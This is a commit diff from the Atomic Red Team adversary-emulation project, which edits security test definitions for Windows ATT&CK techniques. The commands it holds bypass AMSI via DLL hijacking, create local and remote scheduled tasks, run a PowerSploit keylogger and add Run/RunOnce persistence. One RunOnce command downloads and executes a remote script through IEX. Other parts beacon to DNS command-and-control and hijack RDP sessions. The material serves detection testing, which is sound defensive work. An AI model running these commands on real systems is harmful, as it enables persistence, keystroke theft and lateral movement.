security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Improve tests (#715)

Browse Source 
* continue work

* remove duplicate test, this is also in 1023

* update more tests

* cleaning pass
This commit is contained in:
Andrew Beers
2019-12-10 07:51:01 -06:00
committed by Carrie Roberts
parent 7eca6e24e4
commit 48ef8edee0
8 changed files with 80 additions and 110 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1038/T1038.yaml
+5 -4
View File
@@ -8,14 +8,15 @@ atomic_tests:
Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
cmd.exe /k %APPDATA%\updater.exe
%APPDATA%\updater.exe -Command exit
cleanup_command: |
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
atomics/T1053/T1053.yaml
+10 -11
View File
@@ -7,21 +7,18 @@ atomic_tests:
description: |
Executes cmd.exe
Note: deprecated in Windows 8+
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
at 13:20 /interactive cmd
- name: Scheduled task Local
description: |
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
@@ -31,19 +28,19 @@ atomic_tests:
description: What time 24 Hour
type: String
default: 20:10
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: |
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
cleanup_command: |
SCHTASKS /Delete /TN spawn /F
- name: Scheduled task Remote
description: |
Create a task on a remote system
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
@@ -67,16 +64,18 @@ atomic_tests:
default: At0micStrong
executor:
name: command_prompt
elevation_required: true
command: |
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
cleanup_command: |
SCHTASKS /Delete /TN "Atomic task" /F
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
These could be concidered "fileless" scheduled task creation.
Create an atomic scheduled task that leverages native powershell cmdlets.
These could be considered "fileless" scheduled task creation.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
atomics/T1056/T1056.yaml
+6 -5
View File
@@ -8,17 +8,18 @@ atomic_tests:
Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
supported_platforms:
- windows
input_arguments:
filepath:
description: Name of the local file, include path.
type: Path
default: c:\key.log
default: $env:TEMP\key.log
executor:
name: powershell
elevation_required: true
command: |
$PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: |
Remove-Item $env:TEMP\key.log
atomics/T1060/T1060.yaml
+12 -38
View File
@@ -6,77 +6,51 @@ atomic_tests:
- name: Reg Key Run
description: |
Run Key Persistence
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Thing to Run
type: Path
default: C:\Path\AtomicRedTeam.exe
executor:
name: command_prompt
command: |
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
cleanup_command: |
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
- name: Reg Key RunOnce
description: |
RunOnce Key Persistence
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: Path
default: C:\Path\AtomicRedTeam.dll
executor:
name: command_prompt
command: |
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
cleanup_command: |
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
- name: PowerShell Registry RunOnce
description: |
RunOnce Key Persistence via PowerShell
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: Path
default: powershell.exe
executor:
name: powershell
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: |
Add Shortcut To Startup via PowerShell
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: Path
default: C:\Path\AtomicRedTeam.exe
executor:
name: powershell
command: |
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
cleanup_command: |
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
atomics/T1071/T1071.yaml
+5 -3
View File
@@ -111,8 +111,9 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
.\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
- name: DNS Long Domain Query
description: |
This test simulates an infected host returning data to a command and control server using long domain names.
@@ -137,4 +138,5 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
.\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
atomics/T1071/T1071-dns-beacon.ps1 → atomics/T1071/src/T1071-dns-beacon.ps1
+17 -17
View File
@@ -1,18 +1,18 @@
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteam",
[string]$QueryType = "TXT",
[int]$C2Interval = 30,
[int]$C2Jitter = 20,
[int]$RunTime = 30
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$Jitter = (Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1
Start-Sleep -Seconds $C2Interval
}
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteam",
[string]$QueryType = "TXT",
[int]$C2Interval = 30,
[int]$C2Jitter = 20,
[int]$RunTime = 30
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$Jitter = (Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1
Start-Sleep -Seconds $C2Interval
}
Until ($TimeNow -ge $RunEnd)
atomics/T1071/T1071-dns-domain-length.ps1 → atomics/T1071/src/T1071-dns-domain-length.ps1
+24 -24
View File
@@ -1,25 +1,25 @@
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte",
[string]$QueryType = "TXT"
)
$Subdomain1Length = 1;
$Subdomain2Length = 1;
$Subdomain3Length = 1;
$Subdomain4Length = 1;
for($i=$Domain.Length+12; $i -le 253; $i++) {
$DomainLength = ([string]$i).PadLeft(3, "0")
$DomainToQuery = $DomainLength + "." +
$Subdomain.substring(0, $Subdomain1Length) + "." +
$Subdomain.substring(0, $Subdomain2Length) + "." +
$Subdomain.substring(0, $Subdomain3Length) + "." +
$Subdomain.substring(0, $Subdomain4Length) + "." +
$Domain
Resolve-DnsName -type $QueryType $DomainToQuery -QuickTimeout
if ($Subdomain1Length -lt 63) { $Subdomain1Length++ }
elseif ($Subdomain2Length -lt 63) { $Subdomain2Length++ }
elseif ($Subdomain3Length -lt 63) { $Subdomain3Length++ }
elseif ($Subdomain4Length -lt 63) { $Subdomain4Length++ }
param(
[string]$Domain = "example.com",
[string]$Subdomain = "atomicredteamatomicredteamatomicredteamatomicredteamatomicredte",
[string]$QueryType = "TXT"
)
$Subdomain1Length = 1;
$Subdomain2Length = 1;
$Subdomain3Length = 1;
$Subdomain4Length = 1;
for($i=$Domain.Length+12; $i -le 253; $i++) {
$DomainLength = ([string]$i).PadLeft(3, "0")
$DomainToQuery = $DomainLength + "." +
$Subdomain.substring(0, $Subdomain1Length) + "." +
$Subdomain.substring(0, $Subdomain2Length) + "." +
$Subdomain.substring(0, $Subdomain3Length) + "." +
$Subdomain.substring(0, $Subdomain4Length) + "." +
$Domain
Resolve-DnsName -type $QueryType $DomainToQuery -QuickTimeout
if ($Subdomain1Length -lt 63) { $Subdomain1Length++ }
elseif ($Subdomain2Length -lt 63) { $Subdomain2Length++ }
elseif ($Subdomain3Length -lt 63) { $Subdomain3Length++ }
elseif ($Subdomain4Length -lt 63) { $Subdomain4Length++ }
}
atomics/T1076/T1076.yaml
+1 -8
View File
@@ -6,11 +6,8 @@ atomic_tests:
- name: RDP
description: |
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
@@ -18,27 +15,23 @@ atomic_tests:
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
cleanup_command: |
sc.exe delete sesshijack
- name: RDPto-DomainController
description: |
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
supported_platforms:
- windows
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
default: $ENV:logonserver.TrimStart("\")
username:
description: Username argument default %USERDOMAIN%\%username%
type: String
default: $Env:USERDOMAIN\$ENV:USERNAME
executor:
name: powershell
elevation_required: false